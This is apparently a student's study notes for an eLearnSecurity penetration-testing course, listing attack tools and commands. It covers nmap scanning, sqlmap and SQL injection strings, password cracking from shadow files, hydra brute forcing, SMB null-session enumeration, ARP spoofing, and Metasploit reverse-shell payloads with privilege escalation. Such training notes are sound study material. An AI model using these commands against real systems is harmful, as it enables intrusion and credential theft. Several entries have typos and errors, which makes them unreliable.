Tools and Commands learned from PTS → elearnsecurity:-
NOTE:- This write up is just my notes for PTS course. It does not dispense with what is offered by the elearnsecurity.
Tools:-
- wireshark:-is a protocol analyzer network sniffer, which allows to see the data transmitted over the network. (you will see if the data sent in clear-text or encrypted)
- Burp suit:- used to send http\https requests and analyze the requests and responses.
- subdomain enumeration tools:
a. google.com:- site: company.com
c. virustotal.com
4. Nessus:- is vulnerability assessment scan
once we download the nessus tool from https://www.tenable.com/
Open the terminal and type:- sudo dpkg -i the path of downloaded file
To start nessus type:-sudo service nessusd start then open:- https://www.tenable.com/
5. Dirbuster:- is tool to find hidden files and directories of websites.
6. ophcrack:- is rainbow table attack tool.
Commands (linux OS):-
- To view router table:- ip route
- To add a route manually:- sudo ip route add network-ip via gateway-ip
- To view ARP Cache:- ip neighbour
- To view network statistics and protocols status:- netstat
- To do reverse DNS resolution (from DNS name to ip):- ping
- To write or read something from web site and send http requests and analyze the requests and responses:- netcat\nc
- To write or read something from web site and send https requests and analyze the requests and responses:- openssl $_client -connect.
- subdomain enumeration (collect DNS data from various sources: sublist3r, amass
- To check if a machine is alive or not we use:-ping
- To perform ping sweep:- fping -a -g therange.
- a → to view only alive hosts → for ping sweep (ip range)
11. To send error message and not viewing it in the output 2>/dev/null
12. To perform ping scan using nmap:-nmap -sn ip-address/range
13. To reed the ip-range for nmap tool:- nmap -iL file path
14. To do offline fingerprinting use:-p0f
15. To do active fingerprinting operating systems use:- nmap -O
16. To limit operating system scan:- nmap -O- -osscan-limit
17. To do scan using nmap without port scan:-nmap -Pn
18. To do TCP scan using nmap:- nmap -sT
19. To do SYN scan using nmap:- nmap -sS
20. To do version detection scan using nmap:- nmap -sV
21. To do port scan and specify the port number using nmap:- nmap -P pors
22. To see the reason why not reported:- nmap- -reason
23. To do scan in large company use:- masscan
24. To do fingerprinting on web servers by signature-based using httprint:-
httprint -P0 -h target -s signature files
- P0 → to avoid pinging the host -h the target hosts -s the signature files
HTTP Verbs:-
25. To view the size in bytes of a file:- wc -m file
26. To use command line tool of Dirbuster:- dirb target.
27. To automate sql injection attack GET request using sql map:-
sqlmap –u [url] -p [options]
28. To automate sql injection attack POST request using sql map:-
sqlmap –u [url]- -data=[POST string] -p parameter [options]
- h → for viewing sqlmap manual.
- -u → to assign url target.
- -p → to specify parameters and if we have only one parameter we can ignore it.
- - -dbms= to specify database name.
- - -technique= to specify sql injection technique.
- -b/- -banner → to view banner information.
- - -tables
- - -columns
- - -dump → to view tables entries.
- - -wizard → to enumerate database for beginners.
29. John the Ripper is an extremely popular password cracking tool
— list=formats → to view john encryption formats → john- -list=formats
To crack password →unshadow passwd shadow > file to crack
To perform pure brute forcing →john -incremental -users:users list file to crack
To display discovered password by john → john- -show cracked file
To perform dictionary attack → john -wordlist[=word list file] file to crack
To do mangling → -rules
30. Tool used in network authentication:-hydra
- without any switches/-h → for viewing hydra manual.
- -U → for viewing details about a module.
- -L →To lunch a usernames list inside a file.
- -P →To lunch a passwords list inside a file.
- module name: target → to specify a module.
31. Tool to display information about the target (file share) using samba suit:-nmblookup -A <ip address>
32. Tool to access file share using samba suit:-smbclient -L \\\\<ip address>\\share-name -N
- -L →display all services available in a target.
- -N →force a tool to not ask for a password.
33. To automate Null session exploitation:- enum4linux 10.130.40.80 -n
or
cd /usr/share/doc/python3-impacket/examples/
python3 samrdump.py 192.168.99.162
or
nmap -script=smb-enum-shares 192.168.99.162 → to check for null session
nmap -script=smb-enum-users 192.168.99.162 → to enumerate users
nmap -script=smb-enum-brute 192.168.99.162 →to perform brute force attack
ARP spoofing attack:-
34. To enable linux kernel ip forwarding:- echo 1 > /proc/sys/net/ipv4/ip_forward
or
sudo bash -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'
35. to intercept traffic on a switched LAN using Dsniff tools (MITM attack) :-arpspoof -i <interface> -t <target> -r <host>
36. To start MSFConsole:- msfconsole
- show -h → to view the manual for show command.
- search → to search about for a given term or module.
- show exploits → to display exploits.
- use the path of exploits → to use an exploit.
- back → to cancel exploitations.
- info → to display related information.
- show options → to check exploitation options.
- set options → to configure options.
- show payload →to show executable payloads
- set payload path →to choose payload
- exploit → lunching an exploit.
common meterepter configurations:-
- bind_tcp runs a server process on the target machine that waits for connections from the attacker machine →set payload java/meterpreter/bind_tcp
- reverse_tcp performs a TCP connection back to the attacker machine →set payload linux/x86/meterpreter/reverse_tcp
- bypassuac bypass the restriction use exploit/windows/local/bypassuac
- background → to switch from a Meterpreter session to the console.
- sessions -l → list opened sessions.
- sessions -i number of session → to switch toan opened session.
- sysinfo →retrieve information about the exploited machine.
- ifconfig →prints the network configuration.
- route →prints the routing information.
- getuid — To know which user is running the process.
- getsystem → privilege escalation.
- shell → run standard command shell.
- help →to display all Meterpreter commands.
38. to update metasploit framework:- sudo apt update ; sudo apt install metasploit-framework
39. To perform faster searches we use postgresql service to startit:-sudo service postgresql start
40. to start metasploit:- sudo msfdb init
41. To check if the machine is vulnerable against known vulnerabilities inside msfconsol:- nmap- -script smb-check-vulns.nse- -script-args=unsafe=1 <ip target>
42. To show the know vulnerability uusing nmap:- sudo nmap -p 445 — script vuln 10.10.10.4
43. To connect to a machine using telnet:- telnet ip address -l username.
Attacks:-
- XSS attack:-
2. SQL injection
a. or 1=1;- — -
b. ‘ UNION SELECT null, null;- — -
Sometime we need to put ‘ before injection statements sometime not so we better try it both.
Commands (Windows OS):-
- Tool to display information about the target(file share):-nbtstat
- /? → to view help manual.
- A → display information about the target.
- <00> →means workstation.
- <02>means there is files sharing.
2. Tool to enumerate the shares:- NET VIEW <ip target>
3. To connect to a file share with no usernames and passwords to check for null session:- NET USE \\<ip target address> \IPC$ ‘ ’ /u:’ ’
4. To exploit Null session and enumerate file shares:-enum -S 10.130.40.80
- -S → enumerate file shares
- -U → enumerate users
- -P →check the password policy
5. To automate Null session exploitation:- winfo 10.130.40.80 -n
6. To escalate the privilege:-getsystem
ــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــ
created in 14 September 2020
edited in 6 October 2020
ــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــ